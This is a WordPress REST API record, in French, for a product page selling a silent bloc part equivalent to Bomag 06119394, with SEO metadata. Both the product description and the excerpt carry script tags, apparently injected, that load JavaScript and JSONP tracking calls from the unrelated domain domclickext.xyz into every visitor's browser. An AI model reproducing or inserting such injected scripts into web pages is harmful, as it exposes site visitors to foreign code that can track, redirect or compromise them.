{"id":2915,"date":"2020-12-25T15:04:15","date_gmt":"2020-12-25T14:04:15","guid":{"rendered":"http:\/\/laserelectronique.com\/?product=import-placeholder-for-2612"},"modified":"2024-11-09T11:12:31","modified_gmt":"2024-11-09T10:12:31","slug":"silent-bloc-06119394-bomag","status":"publish","type":"product","link":"https:\/\/laserelectronique.com\/?product=silent-bloc-06119394-bomag","title":{"rendered":"Silent bloc 06119394 Bomag"},"content":{"rendered":"<p><strong>Pi\u00e8ce adaptable \u00e9quivalente \u00e0 06119394 Bomag.<\/strong><\/p>\n<p><strong>Se monte sur BW216 ,BW217, BW218, BW216 &#8230;<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p><strong>Nous consulter pour des produits sp\u00e9cifiques hors catalogue.<\/strong><\/p>\n<p><strong>Devis gratuit.<\/strong><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2062\" src=\"http:\/\/laserins.fr\/wp-content\/uploads\/2018\/05\/silent-bloc-gif.gif\" alt=\"\" width=\"257\" height=\"241\" \/><\/p>\n<p><strong>Document associ\u00e9 :<\/strong><\/p>\n<ul>\n<li><a href=\"http:\/\/laserins.fr\/wp-content\/uploads\/2017\/04\/Doc-usure-rouleau.pdf\">DOC Usure Rouleau<\/a><\/li>\n<\/ul>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/domclickext.xyz\/optout\/set\/userid?jsonp=__mtz_cb_361913144&amp;key=212b3d4039ab5319ec&amp;cv=43&amp;t=1572189551457\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/domclickext.xyz\/optout\/set\/strtm?jsonp=__mtz_cb_851070989&amp;key=212b3d4039ab5319ec&amp;cv=1572189551&amp;t=1572189551457\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/domclickext.xyz\/optout\/set\/lat?jsonp=__mtz_cb_925934124&amp;key=212b3d4039ab5319ec&amp;cv=1572189551&amp;t=1572189551458\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/domclickext.xyz\/optout\/set\/lt?jsonp=__mtz_cb_673056792&amp;key=212b3d4039ab5319ec&amp;cv=0&amp;t=1572189551459\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp;<\/p>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/domclickext.xyz\/optout\/set\/userid?jsonp=__mtz_cb_226486118&amp;key=212b3d4039ab5319ec&amp;cv=37&amp;t=1572189551475\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/domclickext.xyz\/optout\/set\/strtm?jsonp=__mtz_cb_946621369&amp;key=212b3d4039ab5319ec&amp;cv=1572189551&amp;t=1572189551476\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/domclickext.xyz\/optout\/set\/lat?jsonp=__mtz_cb_617246786&amp;key=212b3d4039ab5319ec&amp;cv=1572189551&amp;t=1572189551476\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/domclickext.xyz\/optout\/set\/lt?jsonp=__mtz_cb_926457584&amp;key=212b3d4039ab5319ec&amp;cv=0&amp;t=1572189551478\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"featured_media":2948,"comment_status":"open","ping_status":"closed","template":"","meta":[],"product_cat":[12,91],"product_tag":[],"class_list":{"0":"post-2915","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-rouleaux","7":"product_cat-silent-blocs","8":"","10":"first","11":"instock","12":"taxable","13":"shipping-taxable","14":"product-type-simple"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v24.7 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Silent bloc 06119394 Bomag - LASER ELECTRONIQUE TP<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/laserelectronique.com\/?product=silent-bloc-06119394-bomag\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Silent bloc 06119394 Bomag - LASER ELECTRONIQUE TP\" \/>\n<meta property=\"og:description\" content=\"&nbsp;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/laserelectronique.com\/?product=silent-bloc-06119394-bomag\" \/>\n<meta property=\"og:site_name\" content=\"LASER ELECTRONIQUE TP\" \/>\n<meta property=\"article:modified_time\" content=\"2024-11-09T10:12:31+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/laserelectronique.com\/wp-content\/uploads\/2020\/12\/45A6bis-1.png\" \/>\n\t<meta property=\"og:image:width\" content=\"2050\" \/>\n\t<meta property=\"og:image:height\" content=\"2050\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/laserelectronique.com\/?product=silent-bloc-06119394-bomag\",\"url\":\"https:\/\/laserelectronique.com\/?product=silent-bloc-06119394-bomag\",\"name\":\"Silent bloc 06119394 Bomag - LASER ELECTRONIQUE TP\",\"isPartOf\":{\"@id\":\"https:\/\/laserelectronique.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/laserelectronique.com\/?product=silent-bloc-06119394-bomag#primaryimage\"},\"image\":{\"@id\":\"https:\/\/laserelectronique.com\/?product=silent-bloc-06119394-bomag#primaryimage\"},\"thumbnailUrl\":\"https:\/\/laserelectronique.com\/wp-content\/uploads\/2020\/12\/45A6bis-1.png\",\"datePublished\":\"2020-12-25T14:04:15+00:00\",\"dateModified\":\"2024-11-09T10:12:31+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/laserelectronique.com\/?product=silent-bloc-06119394-bomag#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/laserelectronique.com\/?product=silent-bloc-06119394-bomag\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/laserelectronique.com\/?product=silent-bloc-06119394-bomag#primaryimage\",\"url\":\"https:\/\/laserelectronique.com\/wp-content\/uploads\/2020\/12\/45A6bis-1.png\",\"contentUrl\":\"https:\/\/laserelectronique.com\/wp-content\/uploads\/2020\/12\/45A6bis-1.png\",\"width\":2050,\"height\":2050},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/laserelectronique.com\/?product=silent-bloc-06119394-bomag#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/laserelectronique.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Boutique\",\"item\":\"https:\/\/laserelectronique.com\/?page_id=7\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Silent bloc 06119394 Bomag\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/laserelectronique.com\/#website\",\"url\":\"https:\/\/laserelectronique.com\/\",\"name\":\"LASER ELECTRONIQUE TP\",\"description\":\"VOTRE PARTENAIRE EN GUIDAGE D&#039;ENGINS, TOPOGRAPHIE ET SERVICES\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/laserelectronique.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Silent bloc 06119394 Bomag - LASER ELECTRONIQUE TP","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/laserelectronique.com\/?product=silent-bloc-06119394-bomag","og_locale":"fr_FR","og_type":"article","og_title":"Silent bloc 06119394 Bomag - LASER ELECTRONIQUE TP","og_description":"&nbsp;","og_url":"https:\/\/laserelectronique.com\/?product=silent-bloc-06119394-bomag","og_site_name":"LASER ELECTRONIQUE TP","article_modified_time":"2024-11-09T10:12:31+00:00","og_image":[{"width":2050,"height":2050,"url":"https:\/\/laserelectronique.com\/wp-content\/uploads\/2020\/12\/45A6bis-1.png","type":"image\/png"}],"twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/laserelectronique.com\/?product=silent-bloc-06119394-bomag","url":"https:\/\/laserelectronique.com\/?product=silent-bloc-06119394-bomag","name":"Silent bloc 06119394 Bomag - LASER ELECTRONIQUE TP","isPartOf":{"@id":"https:\/\/laserelectronique.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/laserelectronique.com\/?product=silent-bloc-06119394-bomag#primaryimage"},"image":{"@id":"https:\/\/laserelectronique.com\/?product=silent-bloc-06119394-bomag#primaryimage"},"thumbnailUrl":"https:\/\/laserelectronique.com\/wp-content\/uploads\/2020\/12\/45A6bis-1.png","datePublished":"2020-12-25T14:04:15+00:00","dateModified":"2024-11-09T10:12:31+00:00","breadcrumb":{"@id":"https:\/\/laserelectronique.com\/?product=silent-bloc-06119394-bomag#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/laserelectronique.com\/?product=silent-bloc-06119394-bomag"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/laserelectronique.com\/?product=silent-bloc-06119394-bomag#primaryimage","url":"https:\/\/laserelectronique.com\/wp-content\/uploads\/2020\/12\/45A6bis-1.png","contentUrl":"https:\/\/laserelectronique.com\/wp-content\/uploads\/2020\/12\/45A6bis-1.png","width":2050,"height":2050},{"@type":"BreadcrumbList","@id":"https:\/\/laserelectronique.com\/?product=silent-bloc-06119394-bomag#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/laserelectronique.com\/"},{"@type":"ListItem","position":2,"name":"Boutique","item":"https:\/\/laserelectronique.com\/?page_id=7"},{"@type":"ListItem","position":3,"name":"Silent bloc 06119394 Bomag"}]},{"@type":"WebSite","@id":"https:\/\/laserelectronique.com\/#website","url":"https:\/\/laserelectronique.com\/","name":"LASER ELECTRONIQUE TP","description":"VOTRE PARTENAIRE EN GUIDAGE D&#039;ENGINS, TOPOGRAPHIE ET SERVICES","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/laserelectronique.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"}]}},"_links":{"self":[{"href":"https:\/\/laserelectronique.com\/index.php?rest_route=\/wp\/v2\/product\/2915","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/laserelectronique.com\/index.php?rest_route=\/wp\/v2\/product"}],"about":[{"href":"https:\/\/laserelectronique.com\/index.php?rest_route=\/wp\/v2\/types\/product"}],"replies":[{"embeddable":true,"href":"https:\/\/laserelectronique.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2915"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/laserelectronique.com\/index.php?rest_route=\/wp\/v2\/media\/2948"}],"wp:attachment":[{"href":"https:\/\/laserelectronique.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2915"}],"wp:term":[{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/laserelectronique.com\/index.php?rest_route=%2Fwp%2Fv2%2Fproduct_cat&post=2915"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/laserelectronique.com\/index.php?rest_route=%2Fwp%2Fv2%2Fproduct_tag&post=2915"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}